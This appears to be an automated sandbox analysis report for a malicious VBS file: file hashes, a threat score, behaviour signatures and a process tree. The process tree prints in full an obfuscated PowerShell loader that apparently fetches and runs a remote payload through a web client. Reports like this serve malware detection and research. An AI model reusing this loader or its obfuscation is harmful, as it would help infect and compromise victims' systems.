Analysis

  • max time kernel
    153s
  • max time network
    158s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    17/04/2024, 01:29

General

  • Target

    6e8330fa5453528965d563426bdc2e03d6d36bd860da8aa6499675dcb80f9d35.vbs

  • Size

    402KB

  • MD5

    703313812e7eb2ae5f0fd8e57d3dd125

  • SHA1

    fc8bff9090347b291d37fa579e8edf02c1bfe01e

  • SHA256

    6e8330fa5453528965d563426bdc2e03d6d36bd860da8aa6499675dcb80f9d35

  • SHA512

    6aac5aaacee99f99b3fd7cd1f66e3eb7adf28646bcac8fc2af4a2324da2dfdf1303be65effe4f163015b94a2829be7e62b038c58cbd404030ca70c85f5c41a5a

  • SSDEEP

    6144:ltrc0iH9QXg0Ip+QUJFUWtBVkmqtcECDGk8FD3ZGGBXMV7:lFidQ0AzzfZ

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6e8330fa5453528965d563426bdc2e03d6d36bd860da8aa6499675dcb80f9d35.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unburn = 1;$Procrypsis='Substrin';$Procrypsis+='g';Function Lseners126($Schizomycetic){$Bytt88=$Schizomycetic.Length-$Unburn;For($Skrmhaandteringerne=2; $Skrmhaandteringerne -lt $Bytt88; $Skrmhaandteringerne+=(3)){$Paleornithology+=$Schizomycetic.$Procrypsis.Invoke($Skrmhaandteringerne, $Unburn);}$Paleornithology;}function Sherifian($Demicaponier){&($Imperialised) ($Demicaponier);}$Momstabel=Lseners126 'ViMSpoAlzIsiMilEplKuah./ B5T .Sn0 P Q.( .W .i SnBed noTawSksHu PeNKoT , S1 0 .M.0Do;Ap TeW,ri n o6Sm4Ad; T .tx K6f.4P ;Te Dera.vS : j1M,2Ed1.e. u0P ) H PeGDieFoc UkTooS,/M.2S,0Im1 ,0kl0 M1Ca0Fl1 a AfFDeiBrrOveOpf,lo Px.m/Sp1 ,2He1.e.El0Bo ';$lacunaria=Lseners126 'ArUsts BeS rEp-AnAHmgDeeUnn .t N ';$Malerne=Lseners126 'FihS.t t Up Os B: S/Ud/.al kikrtUntSleBir,n.,ocWiaHutStbP o rx .F.m.uo ke V/Kri NaSh7ChcCagBaxSj.,eckau Ar . ';$Copied86=Lseners126 ' >Fo ';$Imperialised=Lseners126 'StiSte GxAn ';$Twined = Lseners126 ' ieStcOmhPao.r D,%AdaO p.npwhdFlaRit BaA %Bu\BaB ye rhGjnUsduniK,g dsFottwe K.AlL,re Sn r K&Pr&T SeRecAghSco , Hy$No ';Sherifian (Lseners126 ' g$O.gUnlBroCabAfaDylEn: LG BoDipUllVee erF.sAs=Ma(Axc HmFodap Ba/StcR Uo$EfTphwCeiV.nCoeSvdU )Un ');Sherifian (Lseners126 ' M$FogUrlKlo SbEkaOol U: ,D aDay il Ve ,sSas.n9Pr1Al=Pe$ SMD.a PlAfeOrr,inMeeFj.S.sOrpLalGui,ht p(Fy$ RCBaoStpfui Ae Td,u8K.6 .)Ea ');$Malerne=$Dayless91[0];Sherifian (Lseners126 ' ,$K.gArlP oY,bEna Slba:ReRWadResgaeOvlUls ifTauSll .dCaeS.=R.NBoeStwSc-H O Fb.ojUneToc.rtPi D SS.yDes etdieHemDg.svN ,eRetTi.,kWNoeS.b HC,pl iI.e ,nO tSk ');Sherifian (Lseners126 'Wo$AuRNadRosPler,l FsKofMau Sl edPaeWa. ,HreeKoaSkdGreSrrDosSh[P,$ l Sa c,eu .n Da nrBeiTha M]Sa=.a$SlM oo.em s ,tUna ,bAte .lNe ');$Brevenes=Lseners126 ',oRR dU sNue,rlBrsHefLouUnl.fdFoe .ReDBroObwU,nMolBaoP.aSudAfF oi plTee ,(e $.rM Ba lE.ebrr,tn Fe.d,.a$MoCTraBarT iDebUpi keEnnOssM,)La ';$Brevenes=$Goplers[1]+$Brevenes;$Caribiens=$Goplers[0];Sherifian (Lseners126 'Fo$ eg MlNoo.mbCeaPel.c:kaDOpyO kG.kObe ,rT.dEsrGoa.ugIctUn=Ta(GlTSae,osHytB -PlPCra OtFohFi .b$VeCSuaPrr.ai eb,oi KePrnPas k)Br ');while (!$Dykkerdragt) {Sherifian (Lseners126 'Na$ SgN lFlo sbPra l.i:DoTF oDep IpazePunHisS,= e$FotP.rKau WeGe ') ;Sherifian $Brevenes;Sherifian (Lseners126 'BuSCytA aLirTttZa-TiSFolSie oe npT, Un4Sm ');Sherifian (Lseners126 'Gl$ GgHalBaomobSua .l e:ChDI,yDakGek BeOvrSnd orA aDog otWa=La(E,Tf.euts,etLy- tP ua utC.hbo In$SuC.va or ni.vbRii De KnB sIn) F ') ;Sherifian (Lseners126 'Hj$H.gDel VoElb SaTflNo:UbEAnpAsiLapP la alrsrem.o=.n$FjgDel Ao bOma .lS :A.A Pn SnNouCoaAnt .iOvoDunRe+,r+R,%Ce$D.D Sa PyMdl PeUnsFos,m9No1Cr..ocProH,uF,nt t B ') ;$Malerne=$Dayless91[$Epiplasm];}Sherifian (Lseners126 ' a$FogSelP,oFob RaEul S:b.H.ia EeB v OdB.eSv M,=Fi UnG seBetLa-TiC ioFln tUneSpn Ltav an$DrC aL,rLiiHebB,iCoe .n ,s . ');Sherifian (Lseners126 'th$HegNal Fo nb HaSel e:ToOSkub,t.nvM,oreyD.a,agFoeHu ,=P. D.[ kS .yUds CtP eBamG .UhC,oo.nn WvfleDerLntDu]Bo:S,: ,FBir,eoFem yBUnaK.sB,eSs6,r4 BSE t urFliHanR.g ,(.o$.yHsha .eChvKrdpeeKr)Me ');Sherifian (Lseners126 'ci$O gInlUno.lb ,aS,l ,:UeBJeePlc .k.beKar V No=.n L[InS eyVes etabeVim u.EnTsneskxGithe.FlEHanM.cInoT.d DiAfn .g x]St:Su:AeAOuSKoC .I UI P.UrGFye,atEtSFot,orLeiRen,og h( $UhO uSttPrv,ooV.yViaD gLaeN )S ');Sherifian (Lseners126 ' $frg,plCooFobPeaPol.e:SvBPllGea s Ei GnO.g SaSmmFeeFa=Lo$.uBIneLac .k ,eNorEv.,esDiu rb,lsMatB,rPeiRenamg (A.3Ou0An7Ul1.t4Ka5Mi, B2 7Be8 B5By0 ,)U ');Sherifian $Blasingame;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1780
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Behndigste.Len && echo $"
        3⤵
          PID:1544

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1780-22-0x000000001B190000-0x000000001B472000-memory.dmp

            Filesize

            2.9MB

          • memory/1780-23-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

            Filesize

            9.6MB

          • memory/1780-24-0x00000000022A0000-0x00000000022A8000-memory.dmp

            Filesize

            32KB

          • memory/1780-25-0x0000000002200000-0x0000000002280000-memory.dmp

            Filesize

            512KB

          • memory/1780-26-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

            Filesize

            9.6MB

          • memory/1780-27-0x0000000002200000-0x0000000002280000-memory.dmp

            Filesize

            512KB

          • memory/1780-28-0x0000000002200000-0x0000000002280000-memory.dmp

            Filesize

            512KB

          • memory/1780-29-0x0000000002200000-0x0000000002280000-memory.dmp

            Filesize

            512KB

          • memory/1780-30-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

            Filesize

            9.6MB

          • memory/1780-31-0x0000000002200000-0x0000000002280000-memory.dmp

            Filesize

            512KB

          • memory/1780-32-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

            Filesize

            9.6MB